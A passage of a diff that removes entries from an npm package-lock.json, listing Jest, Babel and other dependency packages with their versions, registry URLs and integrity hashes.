"sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.1.0.tgz", - "integrity": "sha512-ldYss8SbBlWva1bs28q78Ju5Zq1F+8BrqBZZ0VFhLBvhh6lCpC2o3gDJi/5DRLs9FgYZCnmPYIVFU4lRXCkyUw==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.12.13", - "@babel/plugin-syntax-class-static-block": "^7.14.5", - "@babel/plugin-syntax-import-attributes": "^7.24.7", - "@babel/plugin-syntax-import-meta": "^7.10.4", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.10.4", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.10.4", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-private-property-in-object": "^7.14.5", - "@babel/plugin-syntax-top-level-await": "^7.14.5" - } - }, - "babel-preset-jest": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", - "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "requires": { - "tweetnacl": "^0.14.3" - } - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "requires": { - "fill-range": "^7.1.1" - } - }, - "browserslist": { - "version": "4.24.2", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.2.tgz", - "integrity": "sha512-ZIc+Q62revdMcqC6aChtW4jz3My3klmCO1fEmINZY/8J3EpBg5/A/D0AKmBveUh6pgoeycoMkVMko84tuYS+Gg==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001669", - "electron-to-chromium": "^1.5.41", - "node-releases": "^2.0.18", - "update-browserslist-db": "^1.1.1" - } - }, - "bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "requires": { - "fast-json-stable-stringify": "2.x" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=" - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001680", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001680.tgz", - "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==", - "dev": true - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==" - }, - "ci-info": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.3.0.tgz", - "integrity": "sha512-riT/3vI5YpVH6/qomlDnJow6TBee2PBKSEpx3O32EGPYbWGIRsIlGRms3Sm74wYE1JMo8RnO04Hb12+v1J5ICw==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.4.1", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.4.1.tgz", - "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" - }, - "create-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", - "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "prompts": "^2.0.1" - } - }, - "cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", - "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", - "dev": true, - "requires": {} - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=" - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", - "dev": true - }, - "eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", - "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "ejs": { - "version": "3.1.10", - "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", - "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", - "dev": true, - "requires": { - "jake": "^10.8.5" - } - }, - "electron-to-chromium": { - "version": "1.5.63", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.63.tgz", - "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", - "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", - "dev": true - }, - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=" - }, - "fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "filelist": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", - "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", - "dev": true, - "requires": { - "minimatch": "^5.0.1" - }, - "dependencies": { - "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0" - } - }, - "minimatch": { - "version": "5.1.6", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", - "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", - "dev": true, - "requires": { - "brace-expansion": "^2.0.1" - } - } - } - }, - "fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "foreground-child": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.0.tgz", - "integrity": "sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==", - "requires": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - }, - "dependencies": { - "signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==" - } - } - }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=" - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "fsevents": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", - "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=" - }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, - "requires": { - "function-bind": "^1.1.2" - } - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", - "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - } - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.2.0.tgz", - "integrity": 